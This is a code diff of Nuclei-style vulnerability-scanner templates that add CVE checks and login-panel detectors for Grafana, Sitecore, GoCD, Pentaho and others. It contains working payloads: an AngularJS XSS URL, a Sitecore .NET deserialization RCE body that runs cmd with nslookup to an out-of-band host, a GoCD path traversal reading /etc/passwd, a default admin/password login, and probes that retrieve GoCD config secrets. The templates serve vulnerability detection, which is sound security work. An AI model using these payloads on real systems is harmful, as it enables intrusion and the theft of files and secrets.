- '<roles>Anonymous</roles>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -25,8 +25,8 @@ requests:
|
||||||
Connection: close
|
Connection: close
|
||||||
X-Requested-With: XMLHttpRequest
|
X-Requested-With: XMLHttpRequest
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Origin: http://{{Hostname}}/
|
Origin: {{BaseURL}}
|
||||||
Referer: http://{{Hostname}}/
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
||||||
|
|
||||||
|
@ -40,10 +40,10 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "\"result\":true"
|
- '"result":true'
|
||||||
- "id"
|
- 'id'
|
||||||
- "params"
|
- 'params'
|
||||||
- "session"
|
- 'session'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -33,15 +33,12 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
|
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
|
||||||
|
- "status_code_1 == 500 && status_code_2 == 200"
|
||||||
- type: status
|
condition: and
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2021-41174
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||||
|
reference:
|
||||||
|
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
|
||||||
|
tags: cve,cve2021,grafana,xss
|
||||||
|
metadata:
|
||||||
|
shodan-query: title:"Grafana"
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-41174
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Grafana"
|
||||||
|
- "frontend_boot_js_done_time_seconds"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"subTitle":"Grafana ([a-z0-9.]+)'
|
|
@ -0,0 +1,114 @@
|
||||||
|
id: CVE-2021-42237
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Sitecore Experience Platform Pre-Auth RCE
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
|
||||||
|
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42237
|
||||||
|
remediation:
|
||||||
|
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
|
||||||
|
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
|
||||||
|
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
||||||
|
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
|
||||||
|
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
||||||
|
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"SiteCore"
|
||||||
|
tags: rce,sitecore,deserialization,oast
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: text/xml
|
||||||
|
|
||||||
|
<?xml version="1.0" ?>
|
||||||
|
<a>
|
||||||
|
<query></query>
|
||||||
|
<source>foo</source>
|
||||||
|
<parameters>
|
||||||
|
<parameter name="">
|
||||||
|
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
|
||||||
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
|
||||||
|
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
|
||||||
|
xmlns:x="http://www.w3.org/2001/XMLSchema"
|
||||||
|
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
|
||||||
|
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
|
||||||
|
xmlns="">2</Count>
|
||||||
|
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
|
||||||
|
xmlns="">
|
||||||
|
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
|
||||||
|
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
|
||||||
|
xmlns:a="http://schemas.datacontract.org/2004/07/System">
|
||||||
|
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
|
||||||
|
xmlns="">
|
||||||
|
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
|
||||||
|
<a:delegateEntry z:Id="7">
|
||||||
|
<a:assembly z:Ref="6" i:nil="true"/>
|
||||||
|
<a:delegateEntry i:nil="true"/>
|
||||||
|
<a:methodName z:Id="8">Compare</a:methodName>
|
||||||
|
<a:target i:nil="true"/>
|
||||||
|
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
|
||||||
|
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
|
||||||
|
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
||||||
|
</a:delegateEntry>
|
||||||
|
<a:methodName z:Id="11">Start</a:methodName>
|
||||||
|
<a:target i:nil="true"/>
|
||||||
|
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
|
||||||
|
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
|
||||||
|
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
||||||
|
</Delegate>
|
||||||
|
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
||||||
|
xmlns=""
|
||||||
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
||||||
|
<Name z:Ref="11" i:nil="true"/>
|
||||||
|
<AssemblyName z:Ref="12" i:nil="true"/>
|
||||||
|
<ClassName z:Ref="13" i:nil="true"/>
|
||||||
|
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
|
||||||
|
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
|
||||||
|
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
||||||
|
<GenericArguments i:nil="true"/>
|
||||||
|
</method0>
|
||||||
|
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
||||||
|
xmlns=""
|
||||||
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
||||||
|
<Name z:Ref="8" i:nil="true"/>
|
||||||
|
<AssemblyName z:Ref="6" i:nil="true"/>
|
||||||
|
<ClassName z:Ref="9" i:nil="true"/>
|
||||||
|
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
|
||||||
|
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
|
||||||
|
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
||||||
|
<GenericArguments i:nil="true"/>
|
||||||
|
</method1>
|
||||||
|
</_comparison>
|
||||||
|
</Comparer>
|
||||||
|
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
|
||||||
|
xmlns="">2</Version>
|
||||||
|
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
|
||||||
|
xmlns="">
|
||||||
|
<string z:Id="25"
|
||||||
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
|
||||||
|
<string z:Id="26"
|
||||||
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
|
||||||
|
</Items>
|
||||||
|
</ArrayOfstring>
|
||||||
|
</parameter>
|
||||||
|
</parameters>
|
||||||
|
</a>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "System.ArgumentNullException"
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: CVE-2021-43287
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pre-Auth Takeover of Build Pipelines in GoCD
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: critical
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
||||||
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||||
|
tags: cve,cve2021,go,lfi,gocd
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: pentaho-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pentaho Default Login
|
||||||
|
author: pussycat0x
|
||||||
|
severity: high
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'pentaho'
|
||||||
|
tags: pentaho,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /pentaho/j_spring_security_check HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
j_username={{user}}&j_password={{pass}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
pass:
|
||||||
|
- password
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'pentaho/Home'
|
||||||
|
- 'JSESSIONID='
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: acemanager-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ACEmanager detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
fofa-dork: 'app="ACEmanager"'
|
||||||
|
tags: login,tech,acemanager
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>::: ACEmanager :::</title>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'ALEOS Version ([0-9.]+) \| Copyright &co'
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: cisco-prime-infrastructure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco Prime Infrastructure
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"prime infrastructure"'
|
||||||
|
tags: panel,cisco
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webacs/pages/common/login.jsp"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'productName = "Prime Infrastructure"'
|
||||||
|
- "Cisco "
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: gocd-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCD Login
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
tags: go,panel,gocd
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'html:"GoCD Version"'
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/go/auth/login'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Login - Go</title>'
|
||||||
|
- 'gocd-params'
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: kenesto-login
|
||||||
|
info:
|
||||||
|
name: Kenesto Login Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
fofa-dork: 'app="kenesto"'
|
||||||
|
tags: login,tech,kenesto
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>Welcome To Kenesto®</title>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: kerio-connect-client
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Kerio Connect Client
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Kerio Connect Client"'
|
||||||
|
tags: panel,kerio
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webmail/login/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Kerio Connect Client</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: meshcentral-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MeshCentral - Login
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"MeshCentral - Login"'
|
||||||
|
tags: panel,meshcentral
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>MeshCentral - Login</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: pentaho-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pentaho Panel
|
||||||
|
author: princechaddha,dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'pentaho'
|
||||||
|
tags: panel,pentaho
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/pentaho/Login'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Pentaho User Console - Login</title>'
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: shoutcast-server
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SHOUTcast Server
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"SHOUTcast Server"'
|
||||||
|
tags: panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.html"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>SHOUTcast Server</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: sitecore-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SiteCore Login
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Welcome to Sitecore"'
|
||||||
|
tags: panel,sitecore
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/sitecore/login/default.aspx'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '/sitecore/shell/Themes/Standard/Default/Login.css'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -4,13 +4,25 @@ info:
|
||||||
name: Apache Solr Exposure
|
name: Apache Solr Exposure
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: panel
|
tags: panel,solr
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Solr Admin"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/solr/'
|
- '{{BaseURL}}/solr/'
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Solr Admin</title>"
|
- "<title>Solr Admin</title>"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'favicon\.ico\?_=([0-9.]+)'
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: weblogic-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Weblogic Login Panel
|
||||||
|
author: bing0o
|
||||||
|
severity: info
|
||||||
|
tags: panel,weblogic
|
||||||
|
metadata:
|
||||||
|
shodan-query: product:"Oracle Weblogic"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/console/login/LoginForm.jsp"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "WebLogic"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,8 +1,8 @@
|
||||||
id: wordpress-panel
|
id: wordpress-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Panel
|
name: WordPress login
|
||||||
author: github.com/its0x08
|
author: its0x08
|
||||||
severity: info
|
severity: info
|
||||||
tags: panel
|
tags: panel
|
||||||
|
|
||||||
|
|
|
@ -1,37 +0,0 @@
|
||||||
id: gitlab-graphql-user-enum
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Gitlab User enumeration via Graphql API
|
|
||||||
author: pikpikcu
|
|
||||||
severity: info
|
|
||||||
tags: gitlab,enum,misconfig
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: POST
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/api/graphql"
|
|
||||||
headers:
|
|
||||||
Content-Type: application/json
|
|
||||||
body: |
|
|
||||||
{
|
|
||||||
"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- "application/json"
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
condition: and
|
|
||||||
words:
|
|
||||||
- avatarUrl
|
|
||||||
- username
|
|
||||||
- email
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
name: GitLab - User Enumeration
|
name: GitLab - User Enumeration
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
|
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
|
||||||
tags: gitlab,enum,misconfig
|
tags: gitlab,enum,misconfig,fuzz
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: gocd-cruise-configuration
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCd Cruise Configuration disclosure
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
||||||
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||||
|
tags: go,gocd,config,exposure,misconfig
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/go/add-on/business-continuity/api/cruise_config"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "server agentAutoRegisterKey"
|
||||||
|
- "webhookSecret"
|
||||||
|
- "tokenGenerationKey"
|
||||||
|
condition: and
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: gocd-encryption-key
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCd Encryption Key
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: low
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
||||||
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||||
|
tags: go,gocd,exposure,misconfig
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "([a-z0-9]){32}"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "([a-z0-9]){32}"
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: gocd-unauth-dashboard
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCd Unauth Dashboard
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
tags: go,gocd,unauth,misconfig
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Create a pipeline - Go</title>'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -3,7 +3,7 @@ id: nginx-status
|
||||||
info:
|
info:
|
||||||
name: Nginx Status Page
|
name: Nginx Status Page
|
||||||
author: dhiyaneshDK
|
author: dhiyaneshDK
|
||||||
severity: low
|
severity: info
|
||||||
tags: misconfig,nginx
|
tags: misconfig,nginx
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: sitecore-debug-page
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SiteCore Debug Page
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Welcome to Sitecore"'
|
||||||
|
tags: debug,sitecore
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/sitecore/'"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
